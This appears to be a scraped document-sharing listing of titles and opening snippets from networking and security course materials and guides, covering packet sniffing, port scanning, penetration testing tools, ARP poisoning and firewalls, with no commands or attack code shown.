Lab 1: Packet Sniffing and Wireshark Introduction CSC 5991 Cyber Security Practice Lab 1: Packet Sniffing and Wireshark The first part of the lab introduces packet sniffer, Wireshark. Wireshark is a free opensource network protocol analyzer.

More information

Make a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder.

Make a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder. CMSC 355 Lab 3 : Penetration Testing Tools Due: September 31, 2010 In the previous lab, we used some basic system administration tools to figure out which programs where running on a system and which files

More information

Information Security. Training

Information Security. Training Information Security Training Importance of Information Security Training There is only one way to keep your product plans safe and that is by having a trained, aware and a conscientious workforce. - Kevin

More information

APNIC elearning: Network Security Fundamentals. 20 March 2013 10:30 pm Brisbane Time (GMT+10)

APNIC elearning: Network Security Fundamentals. 20 March 2013 10:30 pm Brisbane Time (GMT+10) APNIC elearning: Network Security Fundamentals 20 March 2013 10:30 pm Brisbane Time (GMT+10) Introduction Presenter/s Nurul Islam Roman Senior Training Specialist nurul@apnic.net Specialties: Routing &

More information

How-to: DNS Enumeration

How-to: DNS Enumeration 25-04-2010 Author: Mohd Izhar Ali Email: johncrackernet@yahoo.com Website: http://johncrackernet.blogspot.com Table of Contents How-to: DNS Enumeration 1: Introduction... 3 2: DNS Enumeration... 4 3: How-to-DNS

More information

DNS Resolving using nslookup

DNS Resolving using nslookup DNS Resolving using nslookup Oliver Hohlfeld & Andre Schröder January 8, 2007 Abstract This report belongs to a talk given at the networking course (Institue Eurecom, France) in January 2007. It is based

More information

General Network Security

General Network Security 4 CHAPTER FOUR General Network Security Objectives This chapter covers the following Cisco-specific objectives for the Identify security threats to a network and describe general methods to mitigate those

More information

Hands-on Network Traffic Analysis. 2015 Cyber Defense Boot Camp

Hands-on Network Traffic Analysis. 2015 Cyber Defense Boot Camp Hands-on Network Traffic Analysis 2015 Cyber Defense Boot Camp What is this about? Prerequisite: network packet & packet analyzer: (header, data) Enveloped letters inside another envelope Exercises Basic

More information

Penetration Testing Walkthrough

Penetration Testing Walkthrough Penetration Testing Walkthrough Table of Contents Penetration Testing Walkthrough... 3 Practical Walkthrough of Phases 2-5... 4 Chose Tool BackTrack (Armitage)... 5 Choose Target... 6 Phase 2 - Basic Scan...

More information

Armitage. Part 1. Author : r45c4l Mail : infosecpirate@gmail.com. http://twitter.com/#!/r45c4l

Armitage. Part 1. Author : r45c4l Mail : infosecpirate@gmail.com. http://twitter.com/#!/r45c4l Armitage H acking Made Easy Part 1 Author : r45c4l Mail : infosecpirate@gmail.com http://twitter.com/#!/r45c4l Greetz and shouts to the entire ICW team and every Indian hackers Introduction When I started

More information

Network Security Fundamentals

Network Security Fundamentals APNIC elearning: Network Security Fundamentals 27 November 2013 04:30 pm Brisbane Time (GMT+10) Introduction Presenter Sheryl Hermoso Training Officer sheryl@apnic.net Specialties: Network Security IPv6

More information

Lab Objectives & Turn In

Lab Objectives & Turn In Firewall Lab This lab will apply several theories discussed throughout the networking series. The routing, installing/configuring DHCP, and setting up the services is already done. All that is left for

More information

Ethical Hacking as a Professional Penetration Testing Technique

Ethical Hacking as a Professional Penetration Testing Technique Ethical Hacking as a Professional Penetration Testing Technique Rochester ISSA Chapter Rochester OWASP Chapter - Durkee Consulting, Inc. info@rd1.net 2 Background Founder of Durkee Consulting since 1996

More information

Port Scanning. Objectives. Introduction: Port Scanning. 1. Introduce the techniques of port scanning. 2. Use port scanning audit tools such as Nmap.

Port Scanning. Objectives. Introduction: Port Scanning. 1. Introduce the techniques of port scanning. 2. Use port scanning audit tools such as Nmap. Port Scanning Objectives 1. Introduce the techniques of port scanning. 2. Use port scanning audit tools such as Nmap. Introduction: All machines connected to a LAN or connected to Internet via a modem

More information

EKT 332/4 COMPUTER NETWORK

EKT 332/4 COMPUTER NETWORK UNIVERSITI MALAYSIA PERLIS SCHOOL OF COMPUTER & COMMUNICATIONS ENGINEERING EKT 332/4 COMPUTER NETWORK LABORATORY MODULE LAB 2 NETWORK PROTOCOL ANALYZER (SNIFFING AND IDENTIFY PROTOCOL USED IN LIVE NETWORK)

More information

Chapter 8 Router and Network Management

Chapter 8 Router and Network Management Chapter 8 Router and Network Management This chapter describes how to use the network management features of your ProSafe Dual WAN Gigabit Firewall with SSL & IPsec VPN. These features can be found by

More information

ShadowControl ShadowStream

ShadowControl ShadowStream ShadowControl ShadowStream Revision 1.3 4/12/2012 Table of Contents Introduction... 3 Download ShadowStream Server... 3 Installation... 4 Configuration... 5 Creating Users... 6 Testing the User Rights...

More information

Tools for penetration tests 1. Carlo U. Nicola, HT FHNW With extracts from documents of : Google; Wireshark; nmap; Nessus.

Tools for penetration tests 1. Carlo U. Nicola, HT FHNW With extracts from documents of : Google; Wireshark; nmap; Nessus. Tools for penetration tests 1 Carlo U. Nicola, HT FHNW With extracts from documents of : Google; Wireshark; nmap; Nessus. What is a penetration test? Goals: 1. Analysis of an IT-environment and search

More information

Packet Sniffing with Wireshark and Tcpdump

Packet Sniffing with Wireshark and Tcpdump Packet Sniffing with Wireshark and Tcpdump Capturing, or sniffing, network traffic is invaluable for network administrators troubleshooting network problems, security engineers investigating network security

More information

Own your LAN with Arp Poison Routing

Own your LAN with Arp Poison Routing Own your LAN with Arp Poison Routing By: Rorik Koster April 17, 2006 Security is a popular buzzword heard every day throughout our American culture and possibly even more so in our global economy. From

More information

Freshservice Discovery Probe User Guide

Freshservice Discovery Probe User Guide Freshservice Discovery Probe User Guide 1. What is Freshservice Discovery Probe? 1.1 What details does Probe fetch? 1.2 How does Probe fetch the information? 2. What are the minimum system requirements

More information

Exploiting Transparent User Identification Systems

Exploiting Transparent User Identification Systems Exploiting Transparent User Identification Systems Wayne Murphy Benjamin Burns Version 1.0a 1 CONTENTS 1.0 Introduction... 3 1.1 Project Objectives... 3 2.0 Brief Summary of Findings... 4 3.0 Background

More information

FREQUENTLY ASKED QUESTIONS

FREQUENTLY ASKED QUESTIONS FREQUENTLY ASKED QUESTIONS Secure Bytes, October 2011 This document is confidential and for the use of a Secure Bytes client only. The information contained herein is the property of Secure Bytes and may

More information

Using IPM to Measure Network Performance

Using IPM to Measure Network Performance CHAPTER 3 Using IPM to Measure Network Performance This chapter provides details on using IPM to measure latency, jitter, availability, packet loss, and errors. It includes the following sections: Measuring

More information

User Manual. Onsight Management Suite Version 5.1. Another Innovation by Librestream

User Manual. Onsight Management Suite Version 5.1. Another Innovation by Librestream User Manual Onsight Management Suite Version 5.1 Another Innovation by Librestream Doc #: 400075-06 May 2012 Information in this document is subject to change without notice. Reproduction in any manner

More information

TCP/IP Security Problems. History that still teaches

TCP/IP Security Problems. History that still teaches TCP/IP Security Problems History that still teaches 1 remote login without a password rsh and rcp were programs that allowed you to login from a remote site without a password The.rhosts file in your home

More information

Exam Questions SY0-401

Exam Questions SY0-401 Exam Questions SY0-401 CompTIA Security+ Certification http://www.2passeasy.com/dumps/sy0-401/ 1. A company has implemented PPTP as a VPN solution. Which of the following ports would need to be opened

More information

Cain & Abel v 2.5. Password Cracking Via ARP Cache Poisoning Attacks. v.1. Page 1 of 15

Cain & Abel v 2.5. Password Cracking Via ARP Cache Poisoning Attacks. v.1. Page 1 of 15 Cain & Abel v 2.5 Password Cracking Via ARP Cache Poisoning Attacks v.1 2004 Page 1 of 15 Objective: At the end of this lab students will be able to use the password auditing and ARP Poison Routing (APR)

More information

Information Security Training. Assignment 1 Networking

Information Security Training. Assignment 1 Networking Information Security Training Assignment 1 Networking By Justin C. Klein Keane September 28, 2012 Assignment 1 For this assignment you will utilize several networking utilities

More information

Measurement of the Usage of Several Secure Internet Protocols from Internet Traces

Measurement of the Usage of Several Secure Internet Protocols from Internet Traces Measurement of the Usage of Several Secure Internet Protocols from Internet Traces Yunfeng Fei, John Jones, Kyriakos Lakkas, Yuhong Zheng Abstract: In recent years many common applications have been modified

More information

Chapter 8 Security Pt 2

Chapter 8 Security Pt 2 Chapter 8 Security Pt 2 IC322 Fall 2014 Computer Networking: A Top Down Approach 6 th edition Jim Kurose, Keith Ross Addison-Wesley March 2012 All material copyright 1996-2012 J.F Kurose and K.W. Ross,

More information

This Lecture. The Internet and Sockets. The Start 1969. If everyone just sends a small packet of data, they can all use the line at the same.

This Lecture. The Internet and Sockets. The Start 1969. If everyone just sends a small packet of data, they can all use the line at the same. This Lecture The Internet and Sockets Computer Security Tom Chothia How the Internet works. Some History TCP/IP Some useful network tools: Nmap, WireShark Some common attacks: The attacker controls the

More information

Solution of Exercise Sheet 5

Solution of Exercise Sheet 5 Foundations of Cybersecurity (Winter 15/16) Prof. Dr. Michael Backes CISPA / Saarland University saarland university computer science Protocols = {????} Client Server IP Address =???? IP Address =????

More information

The Trivial Cisco IP Phones Compromise

The Trivial Cisco IP Phones Compromise Security analysis of the implications of deploying Cisco Systems SIP-based IP Phones model 7960 Ofir Arkin Founder The Sys-Security Group ofir@sys-security.com http://www.sys-security.com September 2002

More information

20-CS-6053-00X Network Security Spring, 2014. An Introduction To. Network Security. Week 1. January 7

20-CS-6053-00X Network Security Spring, 2014. An Introduction To. Network Security. Week 1. January 7 20-CS-6053-00X Network Security Spring, 2014 An Introduction To Network Security Week 1 January 7 Attacks Criminal: fraud, scams, destruction; IP, ID, brand theft Privacy: surveillance, databases, traffic

More information

Penetration Testing Report Client: Business Solutions June 15 th 2015

Penetration Testing Report Client: Business Solutions June 15 th 2015 Penetration Testing Report Client: Business Solutions June 15 th 2015 Acumen Innovations 80 S.W 8 th St Suite 2000 Miami, FL 33130 United States of America Tel: 1-888-995-7803 Email: info@acumen-innovations.com

More information

TELE 301 Network Management. Lecture 17: File Transfer & Web Caching

TELE 301 Network Management. Lecture 17: File Transfer & Web Caching TELE 301 Network Management Lecture 17: File Transfer & Web Caching Haibo Zhang Computer Science, University of Otago TELE301 Lecture 17: File Transfer & Web Caching 1 Today s Focus FTP & Web Caching!

More information

DNS Pharming Attack Lab

DNS Pharming Attack Lab CNT 5410 - Fall 2014 1 DNS Pharming Attack Lab (This is a modified version of the exercise listed below. Modifications are to provide tighter configuration so as to minimize the risk of traffic leaving

More information

Lab 8.3.2 Conducting a Network Capture with Wireshark

Lab 8.3.2 Conducting a Network Capture with Wireshark Lab 8.3.2 Conducting a Network Capture with Wireshark Objectives Perform a network traffic capture with Wireshark to become familiar with the Wireshark interface and environment. Analyze traffic to a web

More information

Websense Web Security Gateway: What to do when a Web site does not load as expected

Websense Web Security Gateway: What to do when a Web site does not load as expected Websense Web Security Gateway: What to do when a Web site does not load as expected Websense Support Webinar November 2011 web security data security email security Support Webinars 2009 Websense, Inc.

More information

Footprinting and Reconnaissance Tools

Footprinting and Reconnaissance Tools Footprinting and Reconnaissance Tools Topic 1: Common Port Scanning Techniques Do some research on computer ports that are most often scanned by hackers. Identify a port scanning exploit that is interesting

More information

N-CAP Users Guide Everything You Need to Know About Using the Internet! How Firewalls Work

N-CAP Users Guide Everything You Need to Know About Using the Internet! How Firewalls Work N-CAP Users Guide Everything You Need to Know About Using the Internet! How Firewalls Work How Firewalls Work By: Jeff Tyson If you have been using the internet for any length of time, and especially if

More information

Firewalls, Tunnels, and Network Intrusion Detection. Firewalls

Firewalls, Tunnels, and Network Intrusion Detection. Firewalls Firewalls, Tunnels, and Network Intrusion Detection 1 Firewalls A firewall is an integrated collection of security measures designed to prevent unauthorized electronic access to a networked computer system.

More information

AUTHOR CONTACT DETAILS

AUTHOR CONTACT DETAILS AUTHOR CONTACT DETAILS Name Dinesh Shetty Organization Paladion Networks Email ID dinesh.shetty@paladion.net Penetration Testing with Metasploit Framework When i say "Penetration Testing tool" the first

More information

HONEYD (OPEN SOURCE HONEYPOT SOFTWARE)

HONEYD (OPEN SOURCE HONEYPOT SOFTWARE) HONEYD (OPEN SOURCE HONEYPOT SOFTWARE) Author: Avinash Singh Avinash Singh is a Technical Evangelist currently worksing at Appin Technology Lab, Noida. Educational Qualification: B.Tech from Punjab Technical

More information

Understanding Slow Start

Understanding Slow Start Chapter 1 Load Balancing 57 Understanding Slow Start When you configure a NetScaler to use a metric-based LB method such as Least Connections, Least Response Time, Least Bandwidth, Least Packets, or Custom

More information

CSSIA CompTIA Security+ Domain. Network Security. Network Security. Network Security. Network Security. Network Security

CSSIA CompTIA Security+ Domain. Network Security. Network Security. Network Security. Network Security. Network Security Security+ Supported Labs - V1 Lab 1 Network Devices and Technologies - Capturing Network Using tcpdump to Capture Network with Wireshark with Network Miner 2 Secure Network Administration Principles -

More information

Guide to Network Defense and Countermeasures Third Edition. Chapter 2 TCP/IP

Guide to Network Defense and Countermeasures Third Edition. Chapter 2 TCP/IP Guide to Network Defense and Countermeasures Third Edition Chapter 2 TCP/IP Objectives Explain the fundamentals of TCP/IP networking Describe IPv4 packet structure and explain packet fragmentation Describe

More information

The Barracuda Network Connector. System Requirements. Barracuda SSL VPN

The Barracuda Network Connector. System Requirements. Barracuda SSL VPN Barracuda SSL VPN The Barracuda SSL VPN allows you to define and control the level of access that your external users have to specific resources inside your internal network. For users such as road warriors

More information

LEARNING COMPUTER SYSTEMS VULNERABILITIES EXPLOITATION THROUGH PENETRATION TEST EXPERIMENTS

LEARNING COMPUTER SYSTEMS VULNERABILITIES EXPLOITATION THROUGH PENETRATION TEST EXPERIMENTS 1 LEARNING COMPUTER SYSTEMS VULNERABILITIES EXPLOITATION THROUGH PENETRATION TEST EXPERIMENTS Te-Shun Chou and Tijjani Mohammed Department of Technology Systems East Carolina University chout@ecu.edu Abstract

More information

Firewalls, Tunnels, and Network Intrusion Detection

Firewalls, Tunnels, and Network Intrusion Detection Firewalls, Tunnels, and Network Intrusion Detection 1 Part 1: Firewall as a Technique to create a virtual security wall separating your organization from the wild west of the public internet 2 1 Firewalls

More information

Packet Sniffer Detection with AntiSniff

Packet Sniffer Detection with AntiSniff Ryan Spangler University of Wisconsin - Whitewater Department of Computer and Network Administration May 2003 Abstract Packet sniffing is a technique of monitoring every packet that crosses the network.

More information

Packet Capture. Document Scope. SonicOS Enhanced Packet Capture

Packet Capture. Document Scope. SonicOS Enhanced Packet Capture Packet Capture Document Scope This solutions document describes how to configure and use the packet capture feature in SonicOS Enhanced. This document contains the following sections: Feature Overview

More information

Packet Sniffers Submitted in partial fulfillment of the requirement for the award of degree Of MCA

Packet Sniffers Submitted in partial fulfillment of the requirement for the award of degree Of MCA A Seminar report On Packet Sniffers Submitted in partial fulfillment of the requirement for the award of degree Of MCA SUBMITTED TO: www.studymafia.org SUBMITTED BY: www.studymafia.org Preface I have made

More information

040020305-Penetration Testing 2014

040020305-Penetration Testing 2014 Comprehensive Questions/Practical Based :- 040020305-Penetration Testing 2014 1. Demonstrate the installation of BackTrack using Live DVD. Also list all the steps. 2. Demonstrate the installation of BackTrack

More information

Step-by-Step Configuration

Step-by-Step Configuration Step-by-Step Configuration Kerio Technologies Kerio Technologies. All Rights Reserved. Printing Date: August 15, 2007 This guide provides detailed description on configuration of the local network which

More information

CS 326e F2002 Lab 1. Basic Network Setup & Ethereal Time: 2 hrs

CS 326e F2002 Lab 1. Basic Network Setup & Ethereal Time: 2 hrs CS 326e F2002 Lab 1. Basic Network Setup & Ethereal Time: 2 hrs Tasks: 1 (10 min) Verify that TCP/IP is installed on each of the computers 2 (10 min) Connect the computers together via a switch 3 (10 min)

More information

Borderware Firewall Server Version 7.1. VPN Authentication Configuration Guide. Copyright 2005 CRYPTOCard Corporation All Rights Reserved

Borderware Firewall Server Version 7.1. VPN Authentication Configuration Guide. Copyright 2005 CRYPTOCard Corporation All Rights Reserved Borderware Firewall Server Version 7.1 VPN Authentication Configuration Guide Copyright 2005 CRYPTOCard Corporation All Rights Reserved http://www.cryptocard.com Overview The BorderWare Firewall Server

More information

What communication protocols are used to discover Tesira servers on a network?

What communication protocols are used to discover Tesira servers on a network? Understanding device discovery methods in Tesira OBJECTIVES In this application note, basic networking concepts will be summarized to better understand how Tesira servers are discovered over networks.

More information

CYBERTRON NETWORK SOLUTIONS

CYBERTRON NETWORK SOLUTIONS CYBERTRON NETWORK SOLUTIONS CybertTron Certified Ethical Hacker (CT-CEH) CT-CEH a Certification offered by CyberTron @Copyright 2015 CyberTron Network Solutions All Rights Reserved CyberTron Certified

More information

Firewall Firewall August, 2003

Firewall Firewall August, 2003 Firewall August, 2003 1 Firewall and Access Control This product also serves as an Internet firewall, not only does it provide a natural firewall function (Network Address Translation, NAT), but it also

More information

Looking for Trouble: ICMP and IP Statistics to Watch

Looking for Trouble: ICMP and IP Statistics to Watch Looking for Trouble: ICMP and IP Statistics to Watch Laura Chappell, Senior Protocol Analyst Protocol Analysis Institute [lchappell@packet-level.com] www.packet-level.com www.podbooks.com HTCIA Member,

More information

Outline. CSc 466/566. Computer Security. 18 : Network Security Introduction. Network Topology. Network Topology. Christian Collberg

Outline. CSc 466/566. Computer Security. 18 : Network Security Introduction. Network Topology. Network Topology. Christian Collberg Outline Network Topology CSc 466/566 Computer Security 18 : Network Security Introduction Version: 2012/05/03 13:59:29 Department of Computer Science University of Arizona collberg@gmail.com Copyright

More information

Lab 1: Network Devices and Technologies - Capturing Network Traffic

Lab 1: Network Devices and Technologies - Capturing Network Traffic CompTIA Security+ Lab Series Lab 1: Network Devices and Technologies - Capturing Network Traffic CompTIA Security+ Domain 1 - Network Security Objective 1.1: Explain the security function and purpose of

More information

Chapter 4 Managing Your Network

Chapter 4 Managing Your Network Chapter 4 Managing Your Network This chapter describes how to perform network management tasks with your ADSL2+ Modem Wireless Router. Backing Up, Restoring, or Erasing Your Settings The configuration

More information

WiFi Security Assessments

WiFi Security Assessments WiFi Security Assessments Robert Dooling Dooling Information Security Defenders (DISD) December, 2009 This work is licensed under a Creative Commons Attribution 3.0 Unported License. Table of Contents

More information

EXPLORER. TFT Filter CONFIGURATION

EXPLORER. TFT Filter CONFIGURATION EXPLORER TFT Filter Configuration Page 1 of 9 EXPLORER TFT Filter CONFIGURATION Thrane & Thrane Author: HenrikMøller Rev. PA4 Page 1 6/15/2006 EXPLORER TFT Filter Configuration Page 2 of 9 1 Table of Content

More information

Lab VI Capturing and monitoring the network traffic

Lab VI Capturing and monitoring the network traffic Lab VI Capturing and monitoring the network traffic 1. Goals To gain general knowledge about the network analyzers and to understand their utility To learn how to use network traffic analyzer tools (Wireshark)

More information

Click Studios. Passwordstate. Installation Instructions

Click Studios. Passwordstate. Installation Instructions Passwordstate Installation Instructions This document and the information controlled therein is the property of Click Studios. It must not be reproduced in whole/part, or otherwise disclosed, without prior

More information

How to hack a website with Metasploit

How to hack a website with Metasploit How to hack a website with Metasploit By Sumedt Jitpukdebodin Normally, Penetration Tester or a Hacker use Metasploit to exploit vulnerability services in the target server or to create a payload to make

More information

Chapter 6 Configuring the SSL VPN Tunnel Client and Port Forwarding

Chapter 6 Configuring the SSL VPN Tunnel Client and Port Forwarding Chapter 6 Configuring the SSL VPN Tunnel Client and Port Forwarding This chapter describes the configuration for the SSL VPN Tunnel Client and for Port Forwarding. When a remote user accesses the SSL VPN

More information